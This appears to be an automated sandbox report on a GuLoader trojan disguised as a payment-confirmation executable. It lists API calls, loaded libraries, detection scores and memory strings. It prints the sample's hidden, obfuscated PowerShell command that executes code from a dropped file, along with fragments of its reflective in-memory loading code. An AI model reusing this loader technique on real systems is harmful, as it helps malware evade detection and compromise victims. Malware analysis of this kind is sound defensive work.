Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_00403358

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_048CEAD8	2_2_048CEAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_048CF3A8	2_2_048CF3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_048CE790	2_2_048CE790
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_02F23E09	14_2_02F23E09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_02F23A99	14_2_02F23A99
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_02F229E0	14_2_02F229E0

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532

Source: Confirmation transfer Note AGS # 22-00379.exe

Static PE information: invalid certificate

Source: Confirmation transfer Note AGS # 22-00379.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/16@2/2

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7476
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsrABC3.tmp

Jump to behavior

Source: Confirmation transfer Note AGS # 22-00379.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Confirmation transfer Note AGS # 22-00379.exe	ReversingLabs: Detection: 50%
Source: Confirmation transfer Note AGS # 22-00379.exe	Virustotal: Detection: 58%

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

File read: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\exe\wab.pdb_j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbVowV source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbd source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdbd source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\exe\wab.pdbwj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb7j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n(C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: nC:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5987.tmp.dmp.18.dr
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000002.00000002.1633101698.0000000008600000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BO$ .pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: wab.pdb-21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32``oj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdblb source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb@ source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdbaD source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB_ source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbBX source: powershell.exe, 00000002.00000002.1622648515.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
Source:	Binary string: !symbols\exe\wab.pdb30 source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdbws\wab.pdbpdbwab.pdbmail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\wab.pdbiB source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb` source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Xml.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: mscorlib.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbWj% source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb\| source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb& source: WER5987.tmp.dmp.18.dr
Source:	Binary string: C:\Windows\wab.pdbpdbwab.pdbq source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.1634084936.000000000A494000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Staden $Sammenstuvesndvningernes $Transfixed), (Schlemiels @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Convolves = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sprydstage)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Onanerendes, $false).DefineType($Ordgyder, $Vi

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "			Jump to behavior

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07780308 pushad ; iretd	2_2_07780321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FBA0D7 push edx; ret	2_2_08FBA0D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FBA89D push 68950820h; iretd	2_2_08FBA8A3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB5414 push eax; iretd	2_2_08FB5415
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB2007 push eax; iretd	2_2_08FB203D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB296C push eax; ret	2_2_08FB296D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FBAD11 push 8A950820h; ret	2_2_08FBAD17
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB2E56 push edi; iretd	2_2_08FB2E66
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB0212 push edi; iretd	2_2_08FB0216
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB9B71 push eax; retf	2_2_08FB9B74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB2F38 push esi; ret	2_2_08FB2F39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FBBB27 push 99110720h; iretd	2_2_08FBBB2F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04465414 push eax; iretd	14_2_04465415
